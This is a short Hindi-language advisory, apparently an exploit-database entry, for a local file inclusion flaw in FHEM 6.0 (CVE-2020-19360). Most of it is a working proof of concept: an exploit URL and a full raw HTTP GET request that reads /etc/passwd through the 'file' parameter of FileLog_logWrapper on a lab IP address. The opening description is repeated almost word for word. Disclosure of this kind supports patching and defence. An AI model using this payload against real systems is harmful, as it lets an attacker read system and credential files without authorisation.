
FHEM 6.0 में Local File Inclusion (LFI) एक हमलावर को एक फ़ाइल शामिल करने की अनुमति देता है, जिससे संवेदनशील जानकारी का प्रकटीकरण हो सकता है।
FHEM 6.0 में LFI एक हमलावर को फ़ाइल शामिल करने की अनुमति देता है, जिससे संवेदनशील जानकारी का खुलासा हो सकता है।
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-19360
भेद्यता का शोषण करने के लिए, कोई व्यक्ति "file" पैरामीटर बदलकर लक्ष्य से कुछ जानकारी प्राप्त करने के लिए 'http://[HOST]/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text' अनुरोध का उपयोग कर सकता है।
GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1
Host: 172.16.155.129:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

